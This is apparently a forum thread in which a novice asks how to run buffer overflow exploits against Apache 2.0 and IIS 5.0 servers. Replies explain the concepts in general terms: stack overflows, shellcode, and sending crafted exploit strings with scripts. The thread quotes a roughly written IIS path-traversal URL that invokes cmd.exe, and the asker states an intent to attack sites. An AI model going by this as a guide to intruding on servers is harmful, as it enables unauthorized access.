How to execute buffer overflows
Hey guys, just wondering, but before I start reading up on buffer overflows, I want to know if their mostly remotely executable and how most of them are done :P I know the three exploits for apache 2.0 my friends server is running are all buffer overflows, he said he said hed let me get into it before he updates his server. But I just want to know if buffer overflows are for the most part – remotely exploitable – and if apache 2.0's exploits are remotely exploitable. They can be found with a quick google search "apache server 2.0 exploits." Thanks guys!
Buffer overflows are executable whereever there is an app running that is vulnerable to this attack. If that service is a networked app then it is probably remotely exploitable. Whatever means a user has to accessing the service is the same way an attacker can exploit the program. If the program is not networked then it is probably just a priv escalation, DoS, crash, etc.
suid
I know, I'm sorry I dont know more about them, I just found a nice ebook I'm going to read. I was just looking for an answer wether or not they were remotely exploitable – And it was quickly answered, thanks guys :) I'm not going to try and exploit anything yet, but after reading up on the apache 2.0 server exploits, how would i execute them? I dont want to do anything yet, because I want a full understanding before I skid the hell out of a site. But just to null my curiosity :P
They are executed by creating/downloading programming code that exploits the vulnerability, and then inserts a "payload" into the system's memory so it is executed. The payload is usually in Assembler, and does things like opening remote programs or creating shells.
That's a severely over simplified version, and the process can vary depending on the exploit type, but that's generally how it goes.
Hmm, alright I read part of the ebook, and it just assumes I know how to execute them – like for example the infamous IIS 5.0 buffer overflow its something like http:site.com/255%/script/%255/c:/cmd.exe or something along those lies, anyways, say I found a buffer overflow, how would I execute the shell code? Could anyone explain it to me? Or point me to an ebook/tutorial? I'm sort of grasping this concept, but I cant quite fit my head around it. Theres alot of things I cant quite fit together yet – like executing the shell code remotely for example. Thanks for any replies.
Hey there,
I hate to burst your bubble.
What you've quoted isn't exactly a 'buffer overflow exploit' and has nothing strictly to do with 'shellcode' (this is a different term completely), but it is however an exploit of paths and how IIS filters the HTTP 'path' (I guess it's called) passed before it then reads the file and decide either:
- display as HTML/image/etc to the clien
- executes something, such as ASP or PHP, to then return the output to return to the client.
IIS assumes all paths are relative to the wwwroot directory so you can essentially change directory and as you correctly state, run DOS/Command Prompt on the server. However do not confuse the term 'shellcode' in this, because that is primarily used where raw op code instructions are involved and you're overfilling an array of values / block of memory of fixed size within the program where it uses non-memory safe functions.
For buffer overflow in IIS 5.0 you need to be looking at the "Host: " part of the HTTP request and what IIS does with it. You'll need some knowledge of Assembly, CPU and how instructions are carried out, (maybe) memory addressing schemes, how functions are executed and knowledge of the stack for the parameters to the function.
In main system memory, there are three segment "types":
- Data
- Code and
- Stack
A lot of buffer overflow is done by exploiting the stack segment of the program where it uses non-memory safe functions. I believe there are other forms of doing buffer overflow.
To exploit it you add some op codes to "jump" (putting the instruction pointer) to the address they're "injected" on to the stack and then it will execute what you put after that address in place of the original programs' functionality.
This often requires disassembling the code to find the point at which it does all this, to know what various register values are so that you can do a relative short relative memory address jump rather than an absolute memory address - this is because we cannot guarantee the location that IIS is loaded in to memory in the "same place" every time.
Correct me if I am wrong here, I am no expert on this as I've only ever read about it and tried a few examples
http://www.tonews.com/thread/730158/viwa/crack/and/hack/hacking_iis_50_the_complete_guide.html This might be of use.
Note: We don't normally say "remotely execute the code" if you consider, in this case, each system separate… some code runs "locally" on the server (IIS), and on the client (Web Browser / some program with sockets that immitates a web browser request). So the term remote is a bit redundant and miss leading.
You will, however, see the terms "remote code injection" in or "remote file include" in things like ASP/PHP script exploits.
Again, if I have used terminology incorrectly let me know I'm a bit rusty
Hope this helps!
Jim,
Hey one last question – I read that artice you gave me – it was invaluable, ,I loved it, however it says that IIS 5.0 exploit is vulnerable via the URL (duh) however most people recommend netcat for these types of exploits… if I'm going to start running buffer overflows and server exploits, what tools should I use? And if anyone says firefox, I'm just going to feel really dumb. :angry:
No no, not a dumb question I think, given that you've not learned anything about networks (data is sent as packets so called "datagram" structures at the application level)
Think about what it is your trying to pass to the server in the URL:
-
If it's just [a-zA-Z0-9] text type characters rather than raw bytes / op codes, yes you can in the original case you posted about, use a web browser. Since this exploit doesn't provide you an interactive interface with the command prompt you initiate on the server, but rather you can tell it to execute a command and you might get some feed back.
-
If you're doing buffer overflow stuff, you maybe better off learning a programming language that gives you the power to open a connection to a host and send it the specifically formatted "exploit string". This maybe in the form of a script language like Perl/Python, even in PHP you can run on your local machine has capabilities of interfacing with the network.
Why? Well, there are two parts to this, a) we can make sure the program sends the exact binary data to the server which we cannot be certain a web browser would do (at least I think so).
b) it give you greater power to manipulate the format of the exploit and hopefully find an exploit that works, it's rather teadious doing this stuff by hand with PuTTY or Telnet and pasting it in, and again we would have problems with NULL character, and all sorts, as the clipboard treats it as a "string" rather than binary if you wrote it out in a text editor.
Once you have done it once, I reckon it is then easier to pick up the example you know and understand how it works, and then apply it again to a similar challenge.
*Addon to previous post: May need a disassembler too… There are many out there: W32DASM, IDA, HVIEW, OllyDebug (Freeware) and gdb (OpenSource Win32 & Linux/UNIX versions).
Hope this suffices!
Jim,
Hey, with case 1 like you said, are you refferring to SQL injection and RFI? Also I'm reading a book on shell code, and Im re-learning C. I learned it back when I was 12 so im re learning quick, and learning a ton about networking – I stripped it down from the physical layer to the application layer and now i understand how TCP and UDP work and what their heights and downfalls are. However, I dont mean to become a charity case, but I'm a real visual learner, and I cant find any youtube videos on using shellcode to exploit a server. Could you hop on TeamViewer or something of the sort and demonstrate it for me? If not thats fine, I'm learning at a steady rate, I'd just learn more that way. And thanks for the help man!
Good that you've read around…
Where did you pluck SQL injection and Remote File Inclusion from? :D You can do those in a browser, or in a program if you want to, the HTTP Server obviously can't differentiate between the two. (They're both unrelated to the first case)
In the first case, nothing you're doing has anything to do with "remote" anything. You're simply telling IIS, which is run as System, to execute Command Prompt which will also be run as System, inherited from IIS.
I've only ever followed some examples on buffer overflow, a long time ago, so it would be useless me attempting to show you anything… I know there is a very good article written on this website which would probably be more suitable. Again for shellcode, you'll need to know assembly.
A visual demonstration of what goes on in memory would probably help you understand all of what is gong on, most of the time no one does that they assume the knowledge and just show the "proof of concept".
But it needs a lot of explanation about various other things, to get it across to someone with minimal knowledge of this low level machine code and how it all works.
Things like: assembly instructions [mov, shl, shr, jmp, jne, jnz…, you might need to know about different addressing schemes (absolute - the value at the address / indirect - a pointer to the value), how functions are called and how their parameters are passed by using the stack, passing by reference (address of an object) and passing by value(passing the value stored in that object)… etc.
I don't have TeamViewer, not sure I can help you much further unless I do some of it myself anyway… Hope this helps…
Jim,
For more on buffer overflows check out www.cultdeadcow.com/cDc_files/cDc-351/.
Thanks for the replys guys! Thanks for the site also, I downloaded the list of tools, so far you guys have been a huge help. And for any other help ful members that come along this post, Id really love to see you do a buffer over flow, I'm still fairly lost as of how to execute the shell code. I mean, I get how its made, but executing it on another server.. thats totally beyond me. Thanks guys :)